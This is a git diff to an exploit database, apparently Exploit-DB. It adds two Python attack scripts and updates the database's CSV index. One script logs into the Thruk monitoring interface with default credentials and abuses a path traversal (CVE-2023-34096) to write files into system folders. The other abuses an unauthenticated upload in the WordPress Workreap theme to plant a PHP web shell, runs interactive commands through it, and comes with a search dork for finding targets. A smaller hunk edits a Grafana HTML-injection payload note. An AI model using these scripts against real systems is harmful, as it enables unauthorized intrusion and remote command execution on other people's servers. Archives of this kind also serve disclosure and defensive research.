diff --git a/exploits/perl/webapps/51509.py b/exploits/perl/webapps/51509.py new file mode 100755 index 000000000..18e36a67d --- /dev/null +++ b/exploits/perl/webapps/51509.py @@ -0,0 +1,318 @@ +# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal +# Date: 08-Jun-2023 +# Exploit Author: Galoget Latorre (@galoget) +# CVE: CVE-2023-34096 (Galoget Latorre) +# Vendor Homepage: https://thruk.org/ +# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip +# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096 +# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html +# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h +# Affected Versions: <= 3.06 +# Language: Python 3.x +# Tested on: +# - Ubuntu 22.04.5 LTS 64-bit +# - Debian GNU/Linux 10 (buster) 64-bit +# - Kali GNU/Linux 2023.1 64-bit +# - CentOS GNU/Linux 8.5.2111 64-bit + + +#!/usr/bin/python3 +# -*- coding:utf-8 -*- + +import sys +import warnings +import requests +from bs4 import BeautifulSoup +from termcolor import cprint + + +# Usage: python3 exploit.py +# Example: python3 exploit.py http://127.0.0.1/thruk/ + + +# Disable warnings +warnings.filterwarnings('ignore') + + +# Set headers +headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" +} + + +def banner(): + """ + Function to print the banner + """ + + banner_text = """ + __ __ __ __ __ __ __ __ __ __ +/ \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__ +\\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__) + + +Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06 +Exploit & CVE Author: Galoget Latorre (@galoget) +LinkedIn: https://www.linkedin.com/in/galoget +""" + print(banner_text) + + +def usage_instructions(): + """ + Function that validates the number of arguments. + The application MUST have 2 arguments: + - [0]: Name of the script + - [1]: Target URL (Thruk Base URL) + """ + if len(sys.argv) != 2: + print("Usage: python3 exploit.py ") + print("Example: python3 exploit.py http://127.0.0.1/thruk/") + sys.exit(0) + + +def check_vulnerability(thruk_version): + """ + Function to check if the recovered version is vulnerable to CVE-2023-34096. + Prints additional information about the vulnerability. + """ + try: + if float(thruk_version[1:5]) <= 3.06: + if float(thruk_version[4:].replace("-", ".")) < 6.2: + cprint("[+] ", "green", attrs=['bold'], end = "") + print("This version of Thruk is ", end = "") + cprint("VULNERABLE ", "red", attrs=['bold'], end = "") + print("to CVE-2023-34096!") + print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html") + print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h") + print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096") + print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096") + print(" | Thruk Changelog: https://www.thruk.org/changelog.html") + print(" | Fixed version: 3.06-2+") + print("") + return True + else: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.") + return False + except: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("There was an error parsing Thruk's version.\n") + return False + + +def get_thruk_version(): + """ + Function to get Thruk's version via web scraping. + It also verifies the title of the website to check if the target is a Thruk instance. + """ + response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10) + html_soup = BeautifulSoup(response.text, "html.parser") + + if "Thruk Monitoring Webinterface" not in response.text: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.") + sys.exit(-1) + else: + # Extract version anchor tag + version_link = html_soup.find_all("a", {"class": "link text-sm"}) + + if len(version_link) == 1 and version_link[0].has_attr('href'): + thruk_version = version_link[0].text.strip() + cprint("[+] ", "green", attrs=['bold'], end = "") + print(f"Detected Thruk Version (Public Banner): {thruk_version}\n") + return thruk_version + else: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("There was an error retrieving Thruk's version.") + sys.exit(-1) + + +def get_error_info(): + """ + Function to cause an error in the target Thruk instance and collect additional information via web scraping. + """ + # URL that will cause an error + error_url = target + "//cgi-bin/login.cgi" + + # Retrieve Any initial Cookies + error_response = requests.get(error_url, + headers=headers, + allow_redirects=False, + verify=False, + timeout=10) + + cprint("[*] ", "blue", attrs=['bold'], end = "") + print("Trying to retrieve additional information...\n") + try: + # Search for the error tag + html_soup = BeautifulSoup(error_response.text, "html.parser") + error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text + if len(error_report) > 0: + # Print Error Info + error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")] + cprint("[+] ", "green", attrs=['bold'], end = "") + print("Recovered Information: \n") + parsed_error_report = error_report.split("\n") + for error_line in parsed_error_report: + print(f" {error_line}") + except: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("No additional information available.\n") + + +def get_thruk_session_auto_login(): + """ + Function to login into the Thruk instance and retrieve a valid session. + It will use default Thruk's credentials available here: + - https://www.thruk.org/documentation/install.html + + Change credentials if required. + """ + # Default Credentials - Change if required + username = "thrukadmin" # CHANGE ME + password = "thrukadmin" # CHANGE ME + params = {"login": username, "password": password} + + cprint("[*] ", "blue", attrs=['bold'], end = "") + print(f"Trying to autenticate with provided credentials: {username}/{password}\n") + + # Define Login URL + login_url = "cgi-bin/login.cgi" + + session = requests.Session() + # Retrieve Any initial Cookies + session.get(target, headers=headers, allow_redirects=True, verify=False) + + # Login and get thruk_auth Cookie + session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False) + + # Get Cookies as dictionary + cookies = session.cookies.get_dict() + + # Successful Login + if cookies.get('thruk_auth') is not None: + cprint("[+] ", "green", attrs=['bold'], end = "") + print("Successful Authentication!\n") + cprint("[+] ", "green", attrs=['bold'], end = "") + print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n") + return session + # Failed Login + else: + if cookies.get('thruk_message') == "fail_message~~login%20failed": + cprint("[-] ", "red", attrs=['bold'], end = "") + print("Login Failed, check your credentials.") + sys.exit(401) + + +def cve_2023_34096_exploit_path_traversal(logged_session): + """ + Function that attempts to exploit the Path Traversal Vulnerability. + The exploit will try to upload a PoC file to multiple common folders. + This to prevent permissions errors to cause false negatives. + """ + cprint("[*] ", "blue", attrs=['bold'], end = "") + print("Trying to exploit: ", end = "") + cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold']) + + # Define Upload URL + upload_url = "cgi-bin/panorama.cgi" + + # Absolute paths + common_folders = ["/tmp/", + "/etc/thruk/plugins/plugins-enabled/", + "/etc/thruk/panorama/", + "/etc/thruk/bp/", + "/etc/thruk/thruk_local.d/", + "/var/www/", + "/var/www/html/", + "/etc/", + ] + + # Upload PoC file to each folder + for target_folder in common_folders: + # PoC file extension is jpg due to regex validations of Thruk. + # Nevertheless this issue can still cause damage in different ways to the affected instance. + files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")} + data = {"task": "upload", + "type": "image", + "location": f"backgrounds/../../../..{target_folder}" + } + + upload_response = logged_session.post(target + upload_url, + data=data, + files=files, + headers=headers, + allow_redirects=False, + verify=False) + + try: + upload_response = upload_response.json() + if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True: + cprint("[+] ", "green", attrs=['bold'], end = "") + print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n") + elif upload_response.get("msg") == "Fileupload must use existing and writable folder.": + cprint("[-] ", "red", attrs=['bold'], end = "") + print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n") + else: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("File upload failed.\n") + except: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("File upload failed.\n") + + + +if __name__ == "__main__": + banner() + usage_instructions() + + # Change this with the domain or IP address to attack + if sys.argv[1] and sys.argv[1].startswith("http"): + target = sys.argv[1] + else: + target = "http://127.0.0.1/thruk/" + + # Prepare Base Target URL + if not target.endswith('/'): + target += "/" + + cprint("[+] ", "green", attrs=['bold'], end = "") + print(f"Target URL: {target}\n") + + # Get Thruk version via web scraping + scraped_thruk_version = get_thruk_version() + + # Send a request that will generate an error and collect extra info + get_error_info() + + # Check if the instance is vulnerable to CVE-2023-34096 + vulnerable_status = check_vulnerability(scraped_thruk_version) + + if vulnerable_status: + cprint("[+] ", "green", attrs=['bold'], end = "") + print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?") + + # Confirm exploitation + option = input("\nChoice (Y/N): ").lower() + print("") + + if option == "y": + cprint("[*] ", "blue", attrs=['bold'], end = "") + print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n") + # Login into Thruk instance + valid_session = get_thruk_session_auto_login() + # Exploit Path Traversal Vulnerability + cve_2023_34096_exploit_path_traversal(valid_session) + elif option == "n": + cprint("[*] ", "blue", attrs=['bold'], end = "") + print("No exploitation attempts were performed, Goodbye!\n") + sys.exit(0) + else: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("Unknown option entered.") + sys.exit(1) + else: + cprint("[-] ", "red", attrs=['bold'], end = "") + print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.") + sys.exit(2) \ No newline at end of file diff --git a/exploits/php/webapps/51510.py b/exploits/php/webapps/51510.py new file mode 100755 index 000000000..26d3f3627 --- /dev/null +++ b/exploits/php/webapps/51510.py @@ -0,0 +1,80 @@ +# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution +# Dork: inurl:/wp-content/themes/workreap/ +# Date: 2023-06-01 +# Category : Webapps +# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454 +# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l) +# Version: 2.2.2 +# Tested on: Windows/Linux +# CVE: CVE-2021-24499 + + +import requests +import random +import string +import sys + + +def usage(): + banner = ''' + NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution + usage: python3 Workreap_rce.py + example for linux : python3 Workreap_rce.py https://www.exploit-db.com + example for Windows : python Workreap_rce.py https://www.exploit-db.com + ''' + print(f"{BOLD}{banner}{ENDC}") + +def upload_file(target): + print("[ ] Uploading File") + url = target + "/wp-admin/admin-ajax.php" + body = "" + data = {"action": "workreap_award_temp_file_uploader"} + response = requests.post(url, data=data, files={"award_img": (file_name, body)}) + if '{"type":"success",' in response.text: + print(f"{GREEN}[+] File uploaded successfully{ENDC}") + check_php_file(target) + else: + print(f"{RED}[+] File was not uploaded{ENDC}") + +def check_php_file(target): + response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name) + if random_str in response_2.text: + print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}") + print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name) + question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}") + if question == "y" or question == "Y": + print("[ ] Uploading Shell ") + get_rce(target) + else: + usage() + else: + print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}") + +def get_rce(target): + file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php" + body = '\n$output";?>' + data = {"action": "workreap_award_temp_file_uploader"} + response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)}) + print(f"{GREEN}[+] Shell uploaded successfully{ENDC}") + while True: + command = input(f"{YELLOW}Enter a command to execute: {ENDC}") + print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}") + response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}") + print(f"{GREEN}{response_4.text}{ENDC}") + + +if __name__ == "__main__": + global GREEN , RED, YELLOW, BOLD, ENDC + GREEN = '\033[92m' + RED = '\033[91m' + YELLOW = '\033[93m' + BOLD = '\033[1m' + ENDC = '\033[0m' + file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php" + random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + try: + upload_file(sys.argv[1]) + except IndexError: + usage() + except requests.exceptions.RequestException as e: + print("\nPlease Enter Valid Address") \ No newline at end of file diff --git a/exploits/typescript/webapps/51073.txt b/exploits/typescript/webapps/51073.txt index 651ca20da..f03e50375 100644 --- a/exploits/typescript/webapps/51073.txt +++ b/exploits/typescript/webapps/51073.txt @@ -8,8 +8,4 @@ The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field) -Payload used -

Hello

- -Best Regards, - -SimranJeet \ No newline at end of file +Payload used -

Hello

\ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9f4f8dee9..cd397cbbf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11627,7 +11627,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48649,exploits/multiple/webapps/48649.txt,"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation",2020-07-07,"William Summerhill",webapps,multiple,,2020-07-07,2020-07-07,0,CVE-2020-14945,,,,, 48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,,2020-07-14,2020-07-14,0,CVE-2020-14946,,,,, 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,,2020-06-24,2020-06-24,0,CVE-2020-14943,,,,, -51254,exploits/multiple/webapps/51254.txt,"BTCPay Server v1.7.4 - HTML Injection.",2023-04-05,"Manojkumar J",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-0493,,,,, +51254,exploits/multiple/webapps/51254.txt,"BTCPay Server v1.7.4 - HTML Injection",2023-04-05,"Manojkumar J",webapps,multiple,,2023-04-05,2023-06-09,1,CVE-2023-0493,,,,, 31647,exploits/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",webapps,multiple,,2014-02-13,2014-02-13,0,CVE-2014-1219;OSVDB-103236,,,,,http://portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1219/ 48791,exploits/multiple/webapps/48791.txt,"Cabot 0.11.12 - Persistent Cross-Site Scripting",2020-09-07,"Abhiram V",webapps,multiple,,2020-09-07,2020-09-07,0,,,,,, 48144,exploits/multiple/webapps/48144.py,"Cacti 1.2.8 - Authenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/4877c2b2f378ce5937f56b259b69b02840514d4c/Cacti-postauth-rce.py @@ -12680,6 +12680,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43853,exploits/perl/webapps/43853.txt,"OTRS 5.0.x/6.0.x - Remote Command Execution (1)",2018-01-21,Bæln0rn,webapps,perl,,2018-01-21,2021-04-22,0,CVE-2017-16921,,,,http://www.exploit-db.comotrs-6.0.1.tar.bz2, 49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",2021-04-22,Hex_26,webapps,perl,,2021-04-22,2021-04-22,0,,,,,, 44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,,2018-02-28,2018-02-28,1,CVE-2018-6193,,,,, +51509,exploits/perl/webapps/51509.py,"Thruk Monitoring Web Interface 3.06 - Path Traversal",2023-06-09,"Galoget Latorre",webapps,perl,,2023-06-09,2023-06-09,0,CVE-2023-34096,,,,, 44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,,2018-04-02,2018-04-02,0,,,,,, 1651,exploits/php/dos/1651.php,"ADODB < 4.70 - 'tmssql.php' Denial of Service",2006-04-09,rgod,dos,php,,2006-04-08,2016-07-07,1,,,,,http://www.exploit-db.comadodb468.tgz, 30753,exploits/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service",2007-11-12,L4teral,dos,php,,2007-11-12,2014-01-06,1,CVE-2007-5984;OSVDB-45282,,,,,https://www.securityfocus.com/bid/26410/info @@ -33715,6 +33716,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 36184,exploits/php/webapps/36184.txt,"WordPress Theme Web Minimalist 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,webapps,php,,2011-09-24,2015-02-26,1,CVE-2011-3861,,,,,https://www.securityfocus.com/bid/49874/info 38105,exploits/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,webapps,php,80,2015-09-08,2015-09-10,1,OSVDB-127478,,,http://www.exploit-db.com/screenshots/idlt38500/38105-1.png,http://www.exploit-db.comwhitelabel-framework-2.0.6.tar.gz, 49107,exploits/php/webapps/49107.txt,"Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting",2020-11-27,"Ilca Lucian Florin",webapps,php,,2020-11-27,2020-11-27,0,,,,,, +51510,exploits/php/webapps/51510.py,"WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution",2023-06-09,"Mohammad Hossein Khanaki",webapps,php,,2023-06-09,2023-06-09,0,CVE-2021-24499,,,,, 38063,exploits/php/webapps/38063.txt,"WordPress Theme Wp-ImageZoom - 'id' SQL Injection",2012-11-26,Amirh03in,webapps,php,,2012-11-26,2015-09-02,1,OSVDB-87870,,,,,https://www.securityfocus.com/bid/56691/info 47436,exploits/php/webapps/47436.txt,"WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting",2019-09-27,m0ze,webapps,php,,2019-09-27,2019-09-27,0,,,,,, 6336,exploits/php/webapps/6336.txt,"Words tag script 1.2 - 'word' SQL Injection",2008-08-31,"Hussin X",webapps,php,,2008-08-30,2016-12-20,1,OSVDB-47912;CVE-2008-3945,,,,, @@ -33741,7 +33743,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34432,exploits/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,webapps,php,,2009-10-29,2014-08-27,1,,,,,,https://www.securityfocus.com/bid/42327/info 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,, -51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,, +51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,, 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,, 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,, 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,, @@ -34824,7 +34826,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,, 51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,, 51385,exploits/typescript/webapps/51385.txt,"FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)",2023-04-20,"Rodolfo Mariano",webapps,typescript,,2023-04-20,2023-04-20,0,,,,,, -51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,, +51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-06-09,1,CVE-2019-13068,,,,, 19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info 698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,, 22068,exploits/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,dos,unix,,2002-12-04,2016-12-19,1,CVE-2002-2272;OSVDB-7394,,,,,https://www.securityfocus.com/bid/6320/info